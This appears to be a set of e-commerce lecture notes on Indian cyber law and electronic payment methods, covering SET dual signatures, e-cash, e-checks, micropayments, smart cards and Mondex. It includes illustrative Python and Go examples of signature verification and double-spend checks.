Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (Fund Transfer)

• Payment method should be:

– Very secure

– Having low overhead cost

– Transferable

– Acceptable anywhere

– Divisible

– Anonymous

Comparison of the 4C payment methods

SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the internet. It is now widely supported by major credit card companies, including Visa and MasterCard.

• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality - Sensitive messages are encrypted so that they are kept confidential.

– Integrity - Nearly all messages are digitally signed to ensure content integrity.

– Authentication - Authentication is performed through a public key infrastructure.

SET network architecture

Merchant: a seller, which is connected to an acquirer.

Cardholder: a registered holder of the credit card, who is a buyer.

Issuer: the bank that issues the credit card to a cardholder.

Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment Gateway: This is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system, for processing the credit card payment.

SET Digital Certificate System

Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.

How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where

key_public_sign,cardholder: the public signature key of the cardholder

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.
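The three verification steps above, plus the generation step they presuppose (the cardholder signs H[H[PI] || H[OI]] with its private signature key), as a runnable example added for these notes; it is not code from the page or from the SET specification. To stay within the Python standard library it uses textbook RSA on a constructed key built from two Mersenne primes, so the key is illustrative only and a deployment would use a proper library and padding. SHA-256 stands in for H. The PI and OI strings, including the card number, are constructed sample values. The block checks that the merchant verifies from OI and H[PI] without ever holding PI, that the gateway verifies from PI and H[OI] without ever holding OI, and that changing either OI or PI invalidates the DS.

```python
import hashlib


def H(data: bytes) -> bytes:
    """Message digest; the page writes it as H[...]. SHA-256 stands in here."""
    return hashlib.sha256(data).digest()


# Constructed cardholder signature key pair. Two Mersenne primes give a
# modulus large enough to hold a 256-bit digest without any extra library.
# Illustrative only: these primes are public knowledge, so the key is not secret.
P = (1 << 521) - 1
Q = (1 << 607) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # modular inverse (Python 3.8+)
PUBLIC_SIGN_KEY = (N, E)   # key_public_sign,cardholder in the page's notation
PRIVATE_SIGN_KEY = (N, D)  # key_private_sign,cardholder


def rsa_sign(digest: bytes, key: tuple) -> int:
    """Textbook RSA signature over a 32-byte digest (no padding: demo only)."""
    n, d = key
    return pow(int.from_bytes(digest, "big"), d, n)


def rsa_recover(signature: int, key: tuple) -> bytes:
    """D_RSA[DS | key_public_sign,cardholder]: recovers the digest that was signed."""
    n, e = key
    return pow(signature, e, n).to_bytes(32, "big")


def dual_signature(pi: bytes, oi: bytes) -> int:
    """Cardholder side: DS = sign( H[ H[PI] || H[OI] ] )."""
    return rsa_sign(H(H(pi) + H(oi)), PRIVATE_SIGN_KEY)


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI] and DS and never sees PI (Steps 1 to 3)."""
    return rsa_recover(ds, PUBLIC_SIGN_KEY) == H(h_pi + H(oi))


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI, H[OI] and DS and never sees OI."""
    return rsa_recover(ds, PUBLIC_SIGN_KEY) == H(H(pi) + h_oi)


def dual_signature_demo() -> dict:
    """Signs constructed PI/OI and exercises both verifiers, including tampering."""
    pi = b"card=4111-1111-1111-1111;exp=12/29;amount=49.99"  # constructed test number
    oi = b"order=1001;item=textbook;qty=1;amount=49.99"       # constructed order
    ds = dual_signature(pi, oi)
    tampered_oi = b"order=1001;item=textbook;qty=1;amount=4.99"
    tampered_pi = pi + b";amount=0.01"
    return {
        "merchant_ok": merchant_verify(oi, H(pi), ds),
        "gateway_ok": gateway_verify(pi, H(oi), ds),
        "merchant_rejects_tampered_oi": not merchant_verify(tampered_oi, H(pi), ds),
        "gateway_rejects_tampered_pi": not gateway_verify(tampered_pi, H(oi), ds),
    }


if __name__ == "__main__":
    for key, value in dual_signature_demo().items():
        print(key, "->", value)
```

The linkage the page describes falls out of the construction: because the signed value is a hash over both inner digests, the merchant can only check an OI against the specific PI whose digest it was given, and the gateway can only check a PI against the specific OI digest it was given, yet neither party needs the other's plaintext.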

DIGITAL ENVELOPE –

SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions.

Customers are the users who spend E-Cash.

Merchants and traders are vendors who receive E-Cash.

Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments.

The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the upcoming slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

This is issued by a bank and represents a specified sum of real money.

It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending.

Anonymity is preserved unless double spending is attempted.

Serial numbers can allow tracing to prevent money laundering.
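The three-stage flow (withdrawal of tokens from the issuer, payment to the merchant, redemption at the issuer) and the serial-number double-spending check described above, as an added example written for these notes; it is not code from the page or from any real e-cash scheme. The issuer is modelled as a single class that mints tokens carrying a unique random serial, a denomination, and an HMAC tag over both; since in the page's model it is the issuer who authenticates tokens at redemption, an issuer-only MAC key is enough to detect forged or altered tokens, and a set of spent serials is enough to reject a second redemption of the same token. Account names, balances and the key are constructed. One property of the page's description is deliberately not implemented: this issuer sees each serial at withdrawal and again at redemption, so it could link them; the anonymity the page attributes to e-cash requires blind signatures, which are beyond this example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    serial: str  # unique, like the serial number on a currency note
    value: int   # denomination, in the smallest currency unit (constructed)
    tag: str     # issuer's MAC over serial and value: proves the issuer minted it


class Issuer:
    """Toy E-Cash issuer (the customer's bank). Constructed for illustration."""

    def __init__(self, key: bytes) -> None:
        self._key = key            # issuer-only secret; merchants cannot mint tokens
        self._spent = set()        # serials already converted into funds
        self._balances = {}        # account name -> balance

    def _tag(self, serial: str, value: int) -> str:
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def open_account(self, name: str, balance: int) -> None:
        self._balances[name] = balance

    def withdraw(self, customer: str, count: int, denomination: int) -> list:
        """Stage 1: debit the customer's account and mint `count` tokens."""
        total = count * denomination
        if self._balances.get(customer, 0) < total:
            raise ValueError("insufficient funds")
        self._balances[customer] -= total
        tokens = []
        for _ in range(count):
            serial = secrets.token_hex(16)  # 128-bit random serial; unique in practice
            tokens.append(Token(serial, denomination, self._tag(serial, denomination)))
        return tokens

    def redeem(self, merchant: str, token: Token) -> str:
        """Stage 3: the merchant presents a token received in stage 2; the issuer
        authenticates it and converts it into funds exactly once."""
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.value)):
            return "forged"        # tag does not match serial/value: not minted here
        if token.serial in self._spent:
            return "double_spend"  # same serial presented a second time
        self._spent.add(token.serial)
        self._balances[merchant] = self._balances.get(merchant, 0) + token.value
        return "credited"

    def balance(self, name: str) -> int:
        return self._balances.get(name, 0)


def ecash_demo() -> dict:
    """Walks one customer and one merchant through withdrawal and redemption."""
    bank = Issuer(secrets.token_bytes(32))
    bank.open_account("customer", 100)
    tokens = bank.withdraw("customer", 3, 10)  # three 10-unit tokens
    first, second = tokens[0], tokens[1]
    # A token whose value field was edited after minting: the tag no longer matches.
    inflated = Token(second.serial, 1000, second.tag)
    return {
        "customer_balance": bank.balance("customer"),
        "first_redeem": bank.redeem("merchant", first),
        "replay": bank.redeem("merchant", first),
        "inflated": bank.redeem("merchant", inflated),
        "second_redeem": bank.redeem("merchant", second),
        "merchant_balance": bank.balance("merchant"),
    }


if __name__ == "__main__":
    for key, value in ecash_demo().items():
        print(key, "->", value)
```

The order of checks in redeem matters: the tag is verified before the serial is looked up, so an unauthenticated token can never mark a serial as spent and thereby block a legitimate holder's later redemption.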

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However while accessing the customerrsquos account the customer must keep in mind the internet

security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL

website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper

internet security softwares to keep aside the threats of malware evasdrooping and other security

threats

Advantages

We can transfer funds purchase stocks and offer a variety of other services without

having to handle physical cash or cheques

Electronic cash protects its user against theft With electronic cash the customer does

not need to provide financial information

E-cash supports small payments Other online payment system charge a fee for every

transaction no matter how much high or low it is but e-cash has a specific limit for

additional charges thatrsquos why very low payments are not charged a fee

Limitations

Maybe how much secure the e-cash payment system is but still no one is safe against

the online frauds In this case the trader is referred as fraudulent The trader may take

the amount but may not provide the services

While making the payment its very important that the internet connection and power

supply should be active If the payment is in process and internet supply fails in between

it can lead to loss of information ie amount will be charged but it wont reach to trader

and the refund takes very long time in general the refund time is at least 30-45 days

E-Cash is not for everyone Low income segments without computer and internet access

are unable to enjoy the usage of E-Cash

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.
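The authentication and duplicate-detection controls described under "Protecting your business" above, as an added example in Go (not code from these notes or from any processor): the payer signs the check's fields with an ed25519 private key, the processor verifies the signature with the public key it has on file for that account, and a second presentation of the same check is rejected. The account and routing numbers, payee and amounts are constructed sample values.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// ECheck is a constructed, simplified electronic check: the fields the payer
// commits to, plus the payer's digital signature over them.
type ECheck struct {
	Routing string // bank routing number (constructed sample value)
	Account string // account number (constructed sample value)
	Payee   string
	Cents   int64  // amount in cents
	Serial  uint64 // per-payer check number, so two identical checks differ
	Sig     []byte // ed25519 signature made with the payer's private key
}

// digest is the canonical byte string that gets signed; every field that must
// not change in transit is included, and it doubles as the check's identity.
func (c *ECheck) digest() []byte {
	h := sha256.New()
	fmt.Fprintf(h, "%s|%s|%s|%d|%d", c.Routing, c.Account, c.Payee, c.Cents, c.Serial)
	return h.Sum(nil)
}

// Sign attaches the digital signature made with the payer's private key.
func (c *ECheck) Sign(priv ed25519.PrivateKey) { c.Sig = ed25519.Sign(priv, c.digest()) }

// Verify checks the signature with the payer's public key; it fails if the
// check was altered or was not signed by the holder of the private key.
func (c *ECheck) Verify(pub ed25519.PublicKey) bool {
	return ed25519.Verify(pub, c.digest(), c.Sig)
}

var (
	ErrUnknownAccount = errors.New("no public key on file for this account")
	ErrBadSignature   = errors.New("digital signature does not verify")
	ErrDuplicate      = errors.New("this check has already been presented")
)

// Processor stands in for the merchant's processor: it holds each payer's
// public key and remembers every check it has already accepted.
type Processor struct {
	pubKeys map[string]ed25519.PublicKey // account number -> public key
	seen    map[string]bool              // hex digest of accepted checks
}

// Accept performs the two controls from the text: authentication (does the
// signature verify for this account?) and duplicate detection (has this exact
// check been presented before?).
func (p *Processor) Accept(c *ECheck) error {
	pub, ok := p.pubKeys[c.Account]
	if !ok {
		return ErrUnknownAccount
	}
	if !c.Verify(pub) {
		return ErrBadSignature
	}
	id := hex.EncodeToString(c.digest())
	if p.seen[id] {
		return ErrDuplicate
	}
	p.seen[id] = true
	return nil
}

// DemoECheck runs a constructed scenario: a valid check, the same check
// presented a second time, and a copy whose amount was altered after signing.
func DemoECheck() (first, replay, tampered error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	const acct = "000987654" // constructed account number
	proc := &Processor{pubKeys: map[string]ed25519.PublicKey{acct: pub}, seen: map[string]bool{}}

	chk := &ECheck{Routing: "123456789", Account: acct, Payee: "Example Store", Cents: 4999, Serial: 1}
	chk.Sign(priv)

	first = proc.Accept(chk)  // nil: signature valid, first presentation
	replay = proc.Accept(chk) // ErrDuplicate: same digest seen already
	forged := *chk
	forged.Cents = 499900           // altered amount, original signature kept
	tampered = proc.Accept(&forged) // ErrBadSignature
	return first, replay, tampered
}

func main() {
	a, b, c := DemoECheck()
	fmt.Println("first:", a, "| replay:", b, "| tampered:", c)
}
```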

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System (figure)


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment/credit based)
- PayWord (post-payment)


MICRO PAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
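The third-party scheme just described, as an added example in Go (not code from these notes or from any provider): the provider holds the users' Internet wallet accounts and each seller's running total, every per-fee link debits the wallet, and the accumulated micropayments are paid out to a seller as one larger payment once its total reaches a threshold. Amounts are kept in mills (thousandths of a dollar) so fraction-of-a-cent fees stay exact; the user and seller names, fees and the 50-cent threshold are constructed values.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
)

// Amounts are in mills (thousandths of a dollar), so the fraction-of-a-cent
// payments the text mentions stay in exact integer arithmetic.
const (
	Cent   int64 = 10
	Dollar int64 = 1000
)

var (
	ErrNoWallet     = errors.New("user has no wallet with the provider")
	ErrInsufficient = errors.New("wallet balance too low for this fee")
)

// Payout is one aggregated payment to a seller.
type Payout struct {
	Seller string
	Mills  int64
}

// Provider is a constructed model of the third-party service in the text: it
// keeps the users' Internet wallet accounts, accumulates each seller's
// micropayments, and pays them out as single larger payments.
type Provider struct {
	wallets   map[string]int64 // user -> balance in mills
	pending   map[string]int64 // seller -> accumulated, not yet paid out
	threshold int64            // a seller is paid once this much has built up
}

func NewProvider(threshold int64) *Provider {
	return &Provider{wallets: map[string]int64{}, pending: map[string]int64{}, threshold: threshold}
}

// Deposit funds a user's wallet (e.g. from a card payment to the provider).
func (p *Provider) Deposit(user string, mills int64) { p.wallets[user] += mills }

// Charge is what following a per-fee link triggers: the wallet is debited and
// the seller's running total is credited; no money moves to the seller yet.
func (p *Provider) Charge(user, seller string, mills int64) error {
	bal, ok := p.wallets[user]
	if !ok {
		return ErrNoWallet
	}
	if mills <= 0 || bal < mills {
		return ErrInsufficient
	}
	p.wallets[user] = bal - mills
	p.pending[seller] += mills
	return nil
}

// Collect settles every seller whose accumulated total has reached the
// threshold as one payment; smaller totals keep accumulating.
func (p *Provider) Collect() []Payout {
	var out []Payout
	for seller, total := range p.pending {
		if total >= p.threshold {
			out = append(out, Payout{Seller: seller, Mills: total})
			delete(p.pending, seller)
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Seller < out[j].Seller })
	return out
}

func (p *Provider) Balance(user string) int64   { return p.wallets[user] }
func (p *Provider) Pending(seller string) int64 { return p.pending[seller] }

// DemoMicropayments runs a constructed day of browsing: the user reads three
// articles at half a cent each and buys two songs at 25 cents each, then the
// provider collects. Only the music seller has reached the 50-cent threshold.
func DemoMicropayments() (*Provider, []Payout, error) {
	p := NewProvider(50 * Cent)
	p.Deposit("alice", 5*Dollar)
	for i := 0; i < 3; i++ {
		if err := p.Charge("alice", "news-site", Cent/2); err != nil {
			return nil, nil, err
		}
	}
	for i := 0; i < 2; i++ {
		if err := p.Charge("alice", "music-site", 25*Cent); err != nil {
			return nil, nil, err
		}
	}
	// A user with no wallet cannot be charged: the per-fee link simply fails.
	rejected := p.Charge("mallory", "news-site", Cent)
	return p, p.Collect(), rejected
}

func main() {
	p, paid, rejected := DemoMicropayments()
	fmt.Println("paid out:", paid, "| alice balance (mills):", p.Balance("alice"),
		"| news still pending:", p.Pending("news-site"), "| unknown user:", rejected)
}
```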

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks:

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer's side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options:

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

- Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by Visa and MasterCard SecureCode).

- Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses:

- Publishing
- Marketing
- Software
- Entertainment
- Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

- Standard credit card-sized, with a microchip embedded on it
- Two types:
  - Memory-only chips
  - Microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have math co-processors
  - Perform complex encryption routines quickly
- In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards (figure)


Why Smart Cards?

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages:

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card (figure)


Smart card processing (figure)

Smart Card Applications:

- Ticketless travel
  - Seoul bus system: 4M cards, 1B transactions since 1996
  - Planned for the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government
  - Licenses
- Mall parking
- Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keep transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Support multiple currencies


ADVANTAGES

CONSUMER:
- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT:
- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION:
- Strengthen customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex protect privacy?

Principles protected:
- limits for collecting personal information
- limits for using, disclosing and keeping personal information
- keeping personal information accurate
- safeguarding personal information

Limits for collecting personal information:
- loads from account
- deposits into account
- lost transactions

Limits for using, disclosing and keeping personal information:
- safeguard deposits
- to reimburse for non-performance

Keeping personal information accurate:
- load and unload are online
- a rolling log of 10 transactions provides the exact spend and retailer name

Safeguarding personal information:
